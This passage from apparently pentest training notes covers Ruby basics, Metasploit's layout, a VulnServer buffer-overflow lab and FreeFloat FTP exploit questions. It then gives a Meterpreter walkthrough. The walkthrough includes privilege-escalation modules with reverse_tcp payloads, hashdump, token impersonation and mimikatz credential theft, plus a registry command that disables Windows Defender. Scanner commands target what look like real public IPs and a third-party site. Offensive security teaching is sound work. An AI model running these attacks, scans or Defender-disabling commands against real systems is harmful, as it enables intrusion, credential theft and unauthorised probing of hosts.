  673. ---------------------------Type This-----------------------------------
  674. infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities"
  675. "I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}
  676. "I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}
  677. -----------------------------------------------------------------------
  678.  
  679.  
  680. - Arrays, Push and Pop, and Hashes
  681.  
  682.  
  683. - In the following example, numbers is an array that holds 6 integer numbers.
  684.  
  685.  
  686. ---------------------------Type This-----------------------------------
  687. numbers = [2,4,6,8,10,100]
  688. puts numbers[0]
  689. puts numbers[4]
  690. numbers[2] = 150
  691. puts numbers
  692. -----------------------------------------------------------------------
  693.  
  694.  
  695.  
  696. - Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop.
  697.  
  698.  
  699. ---------------------------Type This-----------------------------------
  700. framework = []
  701. framework << "modules"
  702. framework << "exploits"
  703. framework << "payloads"
  704. framework.pop
  705. framework.shift
  706. -----------------------------------------------------------------------
  707.  
  708. - Hash is a collection of elements, which is like the associative array in other languages. Each element has a key
  709. that is used to access the element.
  710.  
  711.  
  712. - Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes.
  713. In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the
  714. respective values: 'what module should you use', 'Windows XP' and 'SSH'.
  715.  
  716. ---------------------------Type This-----------------------------------
  717. metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}
  718. print metasploit.size
  719. print metasploit["microsoft"]
  720. metasploit['microsoft'] = 'redhat'
  721. print metasploit['microsoft']
  722. -----------------------------------------------------------------------
  723.  
  724.  
  725.  
  726. - Writing Ruby Scripts
  727.  
  728.  
  729. - Let's take a look at one of the Ruby modules and see exactly what it is doing. Explain to me exactly what
  730. this program is doing. If we take a look at the Ruby program, we find that it is a TCP port scanner that
  731. someone made to look for a specific port. The port that it is looking for is port 21 (FTP).
  732. ---------------------------Type This-----------------------------------
  733. cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
  734. ls
  735. -----------------------------------------------------------------------
  736.  
  737.  
  738.  
  739. ###########################
  740. # Metasploit Fundamentals #
  741. ###########################
  742.  
  743. - Let's take a little look at Metasploit Framework
  744.  
  745. - First, we should take note of the different directories, the Modular Architecture.
  746.  
  747. The modules that make up the Modular Architecture are
  748. Exploits
  749. Auxiliary
  750. Payload
  751. Encoder
  752. Nops
  753.  
  754.  
  755. Important directories to keep in mind for Metasploit, in case we'd like to edit different modules or add our own,
  756. are:
  758.  
  759. Modules
  760. Scripts
  761. Plugins
  762. External
  763. Data
  764. Tools
  765.  
  766. - Let's take a look inside the Metasploit directory and see what's the
  767. ---------------------------Type This-----------------------------------
  768. cd ~/toolz/metasploit
  769. ls
  770. -----------------------------------------------------------------------
  771.  
  772.  
  773.  
  774. - Now let's take a look inside the Modules directory and see what's there.
  775. ---------------------------Type This-----------------------------------
  776. cd ~/toolz/metasploit/modules
  777. ls
  778. -----------------------------------------------------------------------
  779.  
  780.  
  781. The auxiliary directory is where things like our port scanners will be, or any module that we can run that does
  782. not necessarily need to have a shell or session started on a machine.
  783.  
  784. The exploits directory has our modules that we need to pop a shell on a box.
  785. The external directory is where we can see all of the modules that use external libraries from tools Metasploit uses,
  786. like Burp Suite.
  787. - Let's take a look at the external directory
  788. ---------------------------Type This-----------------------------------
  789. cd ~/toolz/metasploit/external
  790. ls
  791. -----------------------------------------------------------------------
  792.  
  793. - Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.
  794. ---------------------------Type This-----------------------------------
  795. cd ~/toolz/metasploit/data
  796. ls
  797. -----------------------------------------------------------------------
  798.  
  799. - For example, the wordlist directory holds files that have wordlists in them for brute-forcing logins or doing DNS
  800. brute-forcing
  801. ---------------------------Type This-----------------------------------
  802. cd ~/toolz/metasploit/data/wordlists
  803. ls
  804. -----------------------------------------------------------------------
  805.  
  806. - The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter
  807. once a session is created.
  808. ---------------------------Type This-----------------------------------
  809. cd ~/toolz/metasploit/data/meterpreter
  810. ls
  811. -----------------------------------------------------------------------
  812.  
  813. - The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things
  814. like escalating privileges and dumping hashes.
  815.  
  816. These are being phased out, though, and post-exploitation modules are now preferred.
  817. The next important directory that we should get used to is the 'tools' directory. Inside the tools directory we'll
  818. find a bunch of different Ruby scripts that help us on a pentest with things ranging from creating a pattern of code
  819. for creating exploits, to a pattern offset script that finds where in the buffer we need to put our
  820. custom shellcode.
  821.  
  822. The final directory that we'll need to keep in mind is the plugins directory, which houses all the modules that have
  823. to do with other programs to make things like importing and exporting reports simple.
  824. Now that we have a clear understanding of what all of the different directories house, we can take a closer look at
  825. the exploits directory and get a better understanding of how the directory structure is there, so if we make our own
  826. modules we're going to have a better understanding of where everything needs to go.
  827. ---------------------------Type This-----------------------------------
  828. cd ~/toolz/metasploit/modules/exploits
  829. ls
  830. -----------------------------------------------------------------------
  831.  
  832.  
  833. - The exploits directory is split up into several different directories, each one housing exploits for different types
  834. of systems, e.g. Windows, Unix, OSX, dialup and so on.
  835. Likewise, if we were to go into the 'windows' directory, we're going to see that the exploits have been broken down
  836. into categories of different types of services/programs, so that you can pick out an exploit specifically for the
  837. service you're trying to exploit. Let's dig a little deeper into the auxiliary directory and see what all it holds
  838. for us.
  839. ---------------------------Type This-----------------------------------
  840. cd ~/toolz/metasploit/modules/auxiliary/
  841. ls
  842. -----------------------------------------------------------------------
  843.  
  844.  
  845. - And a little further into the directory, let's take a look at what's in the scanner directory
  846. ---------------------------Type This-----------------------------------
  847. cd ~/toolz/metasploit/modules/auxiliary/scanner/
  848. ls
  849. -----------------------------------------------------------------------
  850.  
  851.  
  852. - And one more folder deeper into the structure, let's take a look in the portscan folder
  853. ---------------------------Type This-----------------------------------
  854. cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
  855. ls
  856. -----------------------------------------------------------------------
  857.  
  858. - If we run 'cat tcp.rb' we'll find that this module is simply a TCP scanner that will find tcp ports that are open
  859. and report them back to us in a nice, easily readable format.
  860.  
  861. cat tcp.rb
  862.  
  863.  
  864.  
  865. - Just keep in mind that all of the modules in the auxiliary directory are there for information gathering and for use
  866. once you have a session on a machine.
  867. Taking a look at the payload directory, we can see all the available payloads, which are what run after an exploit
  868. succeeds.
  869. ---------------------------Type This-----------------------------------
  870. cd ~/toolz/metasploit/modules/payloads/
  871. ls
  872. -----------------------------------------------------------------------
  873.  
  874.  
  875. - There are three different types of payloads: singles, stagers, and stages. Each type of payload has a different
  876. use.
  877. Single payloads do everything you need them to do at one single time, so they call a shell back to you and let you
  878. do everything once you have that shell calling back to you.
  879. Stagers are used when payload space is limited: the victim machine calls back to your attack box to get
  880. the rest of the instructions on what it's supposed to do. The first stage of the payload doesn't require all that
  881. much space, since it only calls back to the attacking machine to have the rest of the payload sent to it. Stagers are
  882. mainly used to download Stages payloads.
  883.  
  884.  
  885. - Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind
  886. shells.
  887. ---------------------------Type This-----------------------------------
  888. cd singles
  889. cd windows
  890. ls
  891. -----------------------------------------------------------------------
  892.  
  893.  
  894. - We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and
  895. see what it actually does.
  896. ---------------------------Type This-----------------------------------
  897. cat adduser.rb
  898. -----------------------------------------------------------------------
  899.  
  900. Looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give
  901. the new user "Metasploit" a password of "Metasploit$1". Further down in the file we can actually see the command that
  902. it gives Windows to add the user to the system.
  903.  
  904.  
  905. - Stagers just connect the victim machine back to yours to download the Stages payload, usually with a windows/shell/bind_tcp or windows/shell/reverse_tcp
  908. ---------------------------Type This-----------------------------------
  909. cd ../../stagers
  910. ls
  911. -----------------------------------------------------------------------
  912.  
  913.  
  914.  
  915. - Again, we can see that we have stagers for multiple systems and code types.
  916. ---------------------------Type This-----------------------------------
  917. ls windows/
  918. -----------------------------------------------------------------------
  919.  
  920.  
  921. As you can see, the stagers are mainly just to connect to the victim, to set up a bridge between us and the victim
  922. machine, so we can upload or download our stage payloads and execute commands.
  923. Lastly, we can go to our stages directory to see what all payloads are available for us to send over for use with
  924. our stagers...
  925. ---------------------------Type This-----------------------------------
  926. cd ../stages
  927. ls
  928. -----------------------------------------------------------------------
  929.  
  930.  
  931. Again, we can see that our stages are coded for particular operating systems and languages.
  932. We can take a look at shell.rb and see the shellcode that would be put into the payload that would be staged on the
  933. victim machine which would be encoded to tell the victim machine where to connect back to and what commands to run,
  934. if any.
  935.  
  936. - Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have
  937. already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,
  938. so we can impersonate other users on the system in hopes of elevating our privileges.
  939. ---------------------------Type This-----------------------------------
  940. cd ../../../post/
  941. ls
  942. cd windows/
  943. ls
  944. -----------------------------------------------------------------------
  945.  
  946.  
  947. Inside the windows directory we can see all the post modules that can be run. Capture is a directory that holds all
  948. the modules to load keyloggers, or grab input from the victim machine. Escalate has modules that will try to
  949. escalate our privileges. Gather has modules that will try to enumerate the host to get as much information as
  950. possible out of it. WLAN directory holds modules that can pull down WiFi access points that the victim has in
  951. memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for the network.
  952.  
  953. ###################################
  954. # Getting started with MSFConsole #
  955. ###################################
  956.  
  957. ---------------------------Type This-----------------------------------
  958. cd ~/toolz/metasploit/
  959.  
  960. ./msfconsole
  961. ----------------------------------------------------------------------
  962.  
  963.  
  964.  
  965. ##############################################
  966. # Run any Linux command inside of MSFConsole #
  967. ##############################################
  968.  
  969. Once you are inside of MSFConsole you want to do EVERYTHING
  970. that you'd normally do in your Linux command shell in addition
  971. to running Metasploit commands.
  972.  
  973.  
  974. ---------------------------Type This-----------------------------------
  975. ls
  976.  
  977. pwd
  978.  
  979. ping -c1 yahoo.com
  980.  
  981. nmap yahoo.com
  982. ----------------------------------------------------------------------
  983.  
  984.  
  985.  
  986.  
  987. - You're on the outside scanning publicly accessible targets.
  988.  
  989.  
  990. ---------------------------Type This-----------------------------------
  991. use auxiliary/scanner/portscan/tcp
  992.  
  993. set RHOSTS 217.108.137.200
  994.  
  995. set PORTS 80,1433,1521,3306,8000,8080,8081,10000
  996.  
  997. run
  998. ----------------------------------------------------------------------
  999.  
  1000.  
  1001.  
  1002. - So let's do a quick Google search for someone with a trace.axd file
  1003. - filetype:axd inurl:trace.axd
  1004. --------------------------Type This-----------------------------------
  1005. use auxiliary/scanner/http/ (press the tab key, then press y to look through the http options)
  1006. ----------------------------------------------------------------------
  1007.  
  1008. - Here is an example:
  1009. ---------------------------Type This-----------------------------------
  1010. use auxiliary/scanner/http/trace_axd
  1011.  
  1012. set RHOSTS 207.20.57.112
  1013.  
  1014. set VHOST www.motion-vr.net
  1015.  
  1016. run
  1017. ----------------------------------------------------------------------
  1018.  
  1019.  
  1020.  
  1021.  
  1022. ---------------------------Type This-----------------------------------
  1023. use auxiliary/scanner/http/http_version
  1024.  
  1025. set RHOSTS 45.77.162.239
  1026.  
  1027. set RPORT 80
  1028.  
  1029. run
  1030. ----------------------------------------------------------------------
  1031.  
  1032.  
  1033. ---------------------------Type This-----------------------------------
  1034. use auxiliary/scanner/http/tomcat_enum
  1035.  
  1036. set RHOSTS 217.108.137.200
  1037.  
  1038. set RPORT 8080
  1039.  
  1040. run
  1041. -----------------------------------------------------------------------
  1042.  
  1043.  
  1044. #####################################
  1045. # Quick Stack Based Buffer Overflow #
  1046. #####################################
  1047.  
  1048. - You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
  1049. http://45.63.104.73/ExploitLab.zip
  1050. http://45.63.104.73/nc-password-is-netcat.zip <--- save this file to your c:\windows\system32 directory
  1051.  
  1052.  
  1053.  
  1054. - Extract the ExploitLab.zip file to your Desktop
  1055.  
  1056. - Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  1057.  
  1058. - Open a new command prompt and type:
  1059.  
  1060. ---------------------------Type This-----------------------------------
  1061. nc localhost 9999
  1062. --------------------------------------------------------------------------
  1063.  
  1064. - In the new command prompt window where you ran nc type:
  1065. HELP
  1066.  
  1067. - Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
  1068. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  1069.  
  1070. - Now double-click on 1-simplefuzzer.py
  1071. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  1072.  
  1073.  
  1074. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  1075.  
  1076. - Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  1077.  
  1078. - Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  1079.  
  1080. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  1081.  
  1082. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  1083.  
  1084. - Calculate the distance to EIP by running script 3-3000chars.py
  1085. - This script sends 3000 nonrepeating chars to vulnserv.exe and populates EIP with the value: 396F4338
  1086.  
  1087. 4-count-chars-to-EIP.py
  1088. - In the previous script we see that EIP is overwritten with 396F4338, which is 8 (38), C (43), o (6F), 9 (39)
  1089. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  1090.  
  1091. 5-2006char-eip-check.py
  1092. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  1093.  
  1094. 6-jmp-esp.py
  1095. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  1096.  
  1097. 7-first-exploit
  1098. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  1099.  
  1100. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  1101.  
  1102.  
  1103. ------------------------------
  1104.  
  1105.  
  1106.  
  1107. Skill Level 3. Identify unknown vulnerabilities
  1108. -----------------------------------------------
  1109.  
  1110. - App Type
  1111. ------------
  1112. Stand Alone    Client Server    Web App
  1113.  
  1114. ***(vulnerserver.exe)***
  1115.  
  1116.  
  1117. - Input Type
  1118. -------------
  1119. File    logical network port    Browser
  1120. Keyboard
  1121. Mouse
  1122.  
  1123.  
  1124.  
  1125. ***(9999)***
  1126.  
  1127.  
  1128. - Map & Fuzz app entry points:
  1129. ------------------------------
  1130. - Commands ***(commands)***
  1131. - Methods
  1132. - Verbs
  1133. - functions
  1134. - subroutines
  1135. - controllers
  1136.  
  1137.  
  1138. - Isolate the crash
  1139. -------------------
  1140. App seems to reliably crash at TRUN 2100
  1141.  
  1142.  
  1143. - Calculate the distance to EIP
  1144. -------------------------------
  1145. Distance to EIP is 2006
  1146.  
  1147. We found that EIP was populated with the value: 396F4338
  1148. 396F4338 is 8 (38), C (43), o (6F), 9 (39) so we search for 8Co9 in the non_repeating pattern
  1149.  
  1150. An online tool that we can use for this is:
  1151. https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html
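
The offset calculation described above (and in 4-count-chars-to-EIP.py), as an added Ruby example that is not part of the original notes or the ExploitLab scripts: it rebuilds a non-repeating pattern, converts the EIP value read from the debugger into memory byte order, and finds where those four bytes sit in the input. The function names are hypothetical, and it assumes the lab's non-repeating string uses the Metasploit-style "Aa0Aa1Aa2..." layout.

```ruby
# Added example, not part of the original notes or the ExploitLab scripts.
# Assumption: the non-repeating string uses the Metasploit-style "Aa0Aa1Aa2..." layout.

UPPER  = ('A'..'Z').to_a
LOWER  = ('a'..'z').to_a
DIGITS = ('0'..'9').to_a
MAX_PATTERN = UPPER.size * LOWER.size * DIGITS.size * 3 # 20280 bytes before it repeats

# Build the pattern one 3-character group at a time. Every group is unique,
# so any 4 consecutive characters identify a single position in the string.
def cyclic_pattern(length)
  raise ArgumentError, "length must be 1..#{MAX_PATTERN}" unless (1..MAX_PATTERN).cover?(length)

  out = +''
  UPPER.each do |u|
    LOWER.each do |l|
      DIGITS.each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out
end

# The debugger prints the register as one 32-bit number (e.g. "396F4338").
# x86 is little-endian, so the bytes as they were laid out in memory (and in
# the data that was sent) are the reverse: 38 43 6F 39 -> "8Co9".
def register_to_bytes(hex, little_endian: true)
  raise ArgumentError, 'expected 8 hex digits' unless hex.match?(/\A\h{8}\z/)

  bytes = [hex].pack('H*')
  little_endian ? bytes.reverse : bytes
end

# Offset of the register's bytes inside the pattern, or nil when the value
# did not come from the pattern (for example 41414141 from a run of As).
# Both strings are compared as raw bytes so non-ASCII values cannot raise.
def pattern_offset(register_hex, length: 3000)
  haystack = cyclic_pattern(length).b
  haystack.index(register_to_bytes(register_hex))
end

# One-line summary suitable for crash-triage notes.
def describe(register_hex, length: 3000)
  offset = pattern_offset(register_hex, length: length)
  ascii  = register_to_bytes(register_hex).inspect
  return "#{register_hex} -> #{ascii}: not found in a #{length}-byte pattern" if offset.nil?

  "#{register_hex} -> #{ascii}: found at offset #{offset}; " \
    "bytes #{offset}..#{offset + 3} of the input land in the register"
end

if __FILE__ == $PROGRAM_NAME
  puts describe('396F4338') # the EIP value recorded in these notes
  puts describe('41414141') # a value that is not part of the pattern
end
```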
  1152.  
  1153.  
  1154.  
  1155. - Redirect Program Execution
  1156. ----------------------------
  1157. A 3rd party dll named essfunc.dll seems to be the best candidate for the 'JMP ESP' instruction.
  1158. We learned that we control EAX and ESP in script 2.
  1159.  
  1160.  
  1161.  
  1162.  
  1163.  
  1164. - Implement Shellcode
  1165. ---------------------
  1166. There are only 2 things that can go wrong with shellcode:
  1167. - Not enough space
  1168. - Bad characters
  1169.  
  1170.  
  1171.  
  1172.  
  1173.  
  1174.  
  1175. #########################################
  1176. # FreeFloat FTP Server Exploit Analysis #
  1177. #########################################
  1178.  
  1179.  
  1180.  
  1181. Analyze the following exploit code:
  1182. https://www.exploit-db.com/exploits/15689/
  1183.  
  1184. 1. What is the target platform that this exploit works against?
  1185. 2. What is the variable name for the distance to EIP?
  1186. 3. What is the actual distance to EIP in bytes?
  1187. 4. Describe what is happening in the variable ‘junk2’
  1188.  
  1189.  
  1190.  
  1191.  
  1192. Analysis of the training walk-through based on EID: 15689:
  1193. http://45.63.104.73/ff.zip
  1194.  
  1195.  
  1196.  
  1197.  
  1198. ff1.py
  1199. 1. What does the sys module do?
  1200. 2. What is sys.argv[1] and sys.argv[2]?
  1201. 3. What application entry point is being attacked in this script?
  1202.  
  1203.  
  1204.  
  1205. ff2.py
  1206. 1. Explain what lines 18 - 20 are doing.
  1207. 2. What is pattern_create.rb doing and where can I find it?
  1208. 3. Why can’t I just double click the file to run this script?
  1209.  
  1210.  
  1211.  
  1212. ff3.py
  1213. 1. Explain what is happening in lines 17 to 25.
  1214. 2. Explain what is happening in lines 30 to 32.
  1215. 3. Why is everything below line 35 commented out?
  1216.  
  1217.  
  1218.  
  1219. ff4.py
  1220. 1. Explain what is happening in lines 13 to 15.
  1221. 2. Explain what is happening in line 19.
  1222. 3. What is the total length of buff?
  1223.  
  1224.  
  1225.  
  1226. ff5.py
  1227. 1. Explain what is happening in line 15.
  1228. 2. What is struct.pack?
  1229. 3. How big is the shellcode in this script?
  1230.  
  1231.  
  1232.  
  1233. ff6.py
  1234. 1. What is the distance to EIP?
  1235. 2. How big is the shellcode in this script?
  1236. 3. What is the total byte length of the data being sent to this app?
  1237.  
  1238.  
  1239.  
  1240.  
  1241. ff7.py
  1242. 1. What is a tuple in python?
  1243. 2. How big is the shellcode in this script?
  1244. 3. Did your app crash from this script?
  1245.  
  1246.  
  1247.  
  1248.  
  1249. ff8.py
  1250. 1. How big is the shellcode in this script?
  1251. 2. What is try/except in python?
  1252. 3. What is socket.SOCK_STREAM in Python?
  1253.  
  1254.  
  1255.  
  1256. ff9.py
  1257. 1. What is going on in lines 19 and 20?
  1258. 2. What is the length of the NOPs?
  1259. 3. What DLL did the address of the JMP ESP come from?
  1260.  
  1261.  
  1262.  
  1263.  
  1264. ff010.py
  1265. 1. What is going on in lines 18 - 20?
  1266. 2. What is going on in lines 29 - 32?
  1267. 3. How would a stack adjustment help this script?
  1268.  
  1269.  
  1270. #####################################################
  1271. # Log into the Linux virtual machine on your laptop #
  1272. # username: infosecaddicts #
  1273. # password: infosecaddicts #
  1274. #####################################################
  1275.  
  1276.  
  1277. /bin/bash
  1278.  
  1279. sudo apt-get install -y build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev libyaml-dev curl zlib1g-dev gawk bison libffi-dev libgdbm-dev libncurses5-dev libtool sqlite3 libgmp-dev gnupg2 dirmngr nmap
  1280.  
  1281. gpg2 --keyserver hkp://pool.sks-keyservers.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB
  1282.  
  1283. curl -L https://get.rvm.io | bash -s stable
  1284.  
  1285. source ~/.rvm/scripts/rvm
  1286.  
  1287. echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc
  1288.  
  1289. source ~/.bashrc
  1290.  
  1291. RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - )
  1292.  
  1293. rvm install $RUBYVERSION
  1294.  
  1295. rvm use $RUBYVERSION --default
  1296.  
  1297. cd ~/toolz
  1298.  
  1299. sudo git clone https://github.com/rapid7/metasploit-framework.git
  1300.  
  1301. sudo chown -R `whoami` ~/toolz/metasploit-framework
  1302.  
  1303. mv metasploit-framework metasploit
  1304.  
  1305. cd ~/toolz/metasploit
  1306.  
  1307. rvm --default use ruby-${RUBYVERSION}@metasploit
  1308.  
  1309. rvm --default use ruby-${RUBYVERSION}@metasploit
  1310.  
  1311. rvm use $RUBYVERSION --default
  1312.  
  1313. ruby -v
  1314.  
  1315. gem install bundler
  1316.  
  1317. bundle install
  1318.  
  1319. gem install bundler
  1320.  
  1321. bundle install
  1322.  
  1323.  
  1324. ################################
  1325. # Exploitation with Metasploit #
  1326. ################################
  1327. Step 1: Disable the firewall on your Windows 10 host
  1328.  
  1329. Step 2: Run your command prompt as an administrator
  1330. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  1331.  
  1332. Step 3: Restart your computer (I'm sorry - I know this sux!)
  1333.  
  1334. Step 4: Start the vulnerable server (no need to turn on OllyDBG)
  1335.  
  1336. Step 5: From your CentOS run the following commands
  1337. ---------------------------Type This-----------------------------------
  1338. cd ~/
  1339.  
  1340. wget https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
  1341.  
  1342. unzip ExploitLab.zip
  1343.  
  1344. cd ExploitLab/4-AttackScripts/
  1345.  
  1346. vi vulnserv.rb
  1347.  
  1348. cp vulnserv.rb ~/toolz/metasploit/modules/exploits/windows/misc
  1349.  
  1350. cd ~/toolz/metasploit/
  1351.  
  1352. ./msfconsole
  1353.  
  1354.  
  1355.  
  1356. use exploit/windows/misc/vulnserv
  1357. set PAYLOAD windows/meterpreter/bind_tcp
  1358. set RHOST [CHANGEME-TO-YOUR-WIN10-IP]
  1359. set RPORT 9999
  1360. exploit
  1361. -----------------------------------------------------------------------
  1362.  
  1363.  
  1364.  
  1365.  
  1366.  
  1367. ###########################
  1368. # Client-Side Enumeration #
  1369. ###########################
  1370.  
  1371.  
  1372.  
  1373. ********************************** Figure out who and where you are **********************************
  1374.  
  1375.  
  1376. ---------------------------Type This-----------------------------------
  1377. meterpreter> sysinfo
  1378.  
  1379.  
  1380. meterpreter> getuid
  1381.  
  1382.  
  1383. meterpreter> ipconfig
  1384.  
  1385.  
  1386. meterpreter> run post/windows/gather/checkvm
  1387.  
  1388. meterpreter> run post/multi/manage/autoroute
  1389. -----------------------------------------------------------------------
  1390.  
  1391.  
  1392. ********************************** Enumerate the host you are on **********************************
  1393.  
  1394.  
  1395. ---------------------------Type This-----------------------------------
  1396. meterpreter > run post/windows/gather/enum_applications
  1397.  
  1398. meterpreter > run post/windows/gather/enum_logged_on_users
  1399.  
  1400. meterpreter > run post/windows/gather/usb_history
  1401.  
  1402. meterpreter > run post/windows/gather/enum_shares
  1403.  
  1404. meterpreter > run post/windows/gather/enum_snmp
  1405.  
  1406. meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
  1407. -----------------------------------------------------------------------
  1408.  
  1409.  
  1410.  
  1411.  
  1412. ********************************** Escalate privileges and get hashes **********************************
  1413.  
  1414.  
  1415. ---------------------------Type This-----------------------------------
  1416. meterpreter> use priv
  1417. -----------------------------------------------------------------------
  1418.  
  1419.  
  1420. --Option 1: GetSystem
  1421. ---------------------------Type This-----------------------------------
  1422. meterpreter> getsystem
  1423. -----------------------------------------------------------------------
  1424.  
  1425. --Option 2:
  1426. ---------------------------Type This-----------------------------------
  1427. meterpreter > run post/windows/escalate/getsystem
  1428. -----------------------------------------------------------------------
  1429.  
  1430. --Option 3:
  1431. ---------------------------Type This-----------------------------------
  1432. meterpreter> background
  1433. back
  1434. use post/windows/escalate/droplnk
  1435. set SESSION 1
  1436. set PAYLOAD windows/meterpreter/reverse_tcp
  1437. set LHOST [ ChangeME to CentOS VM IP ]
  1438. set LPORT 1234
  1439. exploit
  1440. -----------------------------------------------------------------------
  1441.  
  1442. --Option 4:
  1443. ---------------------------Type This-----------------------------------
  1444. use exploit/windows/local/bypassuac
  1445. set SESSION 1
  1446. set PAYLOAD windows/meterpreter/reverse_tcp
  1447. set LHOST [ ChangeME to CentOS VM IP ]
  1448. set LPORT 12345
  1449. exploit
  1450. -----------------------------------------------------------------------
  1451.  
  1452.  
  1453. --Option 5:
  1454. ---------------------------Type This-----------------------------------
  1455. use exploit/windows/local/service_permissions
  1456. set SESSION 1
  1457. set PAYLOAD windows/meterpreter/reverse_tcp
  1458. set LHOST [ ChangeME to CentOS VM IP ]
  1459. set LPORT 5555
  1460. exploit
  1461. -----------------------------------------------------------------------
  1462.  
  1463.  
  1464. --Option 6:
  1465. ---------------------------Type This-----------------------------------
  1466. use exploit/windows/local/trusted_service_path
  1467. set SESSION 1
  1468. set PAYLOAD windows/meterpreter/reverse_tcp
  1469. set LHOST [ ChangeME to CentOS VM IP ]
  1470. set LPORT 4567
  1471. exploit
  1472. -----------------------------------------------------------------------
  1473.  
  1474. --Option 7:
  1475. ---------------------------Type This-----------------------------------
  1476. use exploit/windows/local/ppr_flatten_rec
  1477. set SESSION 1
  1478. set PAYLOAD windows/meterpreter/reverse_tcp
  1479. set LHOST [ ChangeME to CentOS VM IP ]
  1480. set LPORT 7777
  1481. exploit
  1482. -----------------------------------------------------------------------
  1483.  
  1484.  
  1485. --Option 8:
  1486. ---------------------------Type This-----------------------------------
  1487. use exploit/windows/local/ms_ndproxy
  1488. set SESSION 1
  1489. set PAYLOAD windows/meterpreter/reverse_tcp
  1490. set LHOST [ ChangeME to CentOS VM IP ]
  1491. set LPORT 7788
  1492. exploit
  1493. -----------------------------------------------------------------------
  1494.  
  1495. --Option 9:
  1496. ---------------------------Type This-----------------------------------
  1497. use exploit/windows/local/ask
  1498. set SESSION 1
  1499. set PAYLOAD windows/meterpreter/reverse_tcp
  1500. set LHOST [ ChangeME to CentOS VM IP ]
  1501. set LPORT 7799
  1502. exploit
  1503. -----------------------------------------------------------------------
  1504.  
  1505.  
  1506. A window will pop up and you need to click Yes in order to get your new meterpreter shell
  1507.  
  1508.  
  1509. meterpreter > getuid
  1510.  
  1511. meterpreter > ps (search for a process running as NT AUTHORITY\SYSTEM)
  1512.  
  1513. meterpreter > migrate 2800 (your process id WILL NOT be 2800, but make sure you use one that is running as NT AUTHORITY\SYSTEM)
  1514.  
  1515. meterpreter > getsystem
  1516. ...got system (via technique 1).
  1517.  
  1518.  
  1519. meterpreter > getuid
  1520. Server username: NT AUTHORITY\SYSTEM
  1521.  
  1522.  
  1523. meterpreter> run post/windows/gather/hashdump
  1524.  
  1525. meterpreter> run post/windows/gather/credentials/credential_collector
  1526. -----------------------------------------------------------------------
  1527.  
  1528.  
  1529. ********************************** Steal Tokens **********************************
  1530.  
  1531. ---------------------------Type This-----------------------------------
  1532. meterpreter > getsystem
  1533.  
  1534. meterpreter > use incognito
  1535.  
  1536. meterpreter > list_tokens -u
  1537.  
  1538. meterpreter > list_tokens -g
  1539.  
  1540. meterpreter > impersonate_token <-- choose who you want to impersonate but be sure to use 2 slashes in the name (ex: impersonate_token domain\\user)
  1541.  
  1542. meterpreter> getuid
  1543. -----------------------------------------------------------------------
  1544.  
  1545.  
  1546. ************ Stealing credentials and certificates ************
  1547. - NOTE: Most of the stuff after 'kerberos' DOES NOT work, but is given here so you know the correct syntax to use when connected to AD or dealing with smart/CAC cards.
  1548.  
  1549. ---------------------------Type This-----------------------------------
  1550. meterpreter > getsystem
  1551.  
  1552. meterpreter > load mimikatz
  1553.  
  1554. meterpreter > kerberos
  1555.  
  1556. meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
  1557.  
  1558. meterpreter > msv <-- Your AD password
  1559.  
  1560. meterpreter > livessp <-- Your Windows8 password
  1561.  
  1562. meterpreter > ssp <-- Your outlook password
  1563.  
  1564. meterpreter > tspkg <-- Your AD password
  1565.  
  1566. meterpreter > wdigest <-- Your AD password
  1567.  
  1568. meterpreter > mimikatz_command -f crypto::listStores
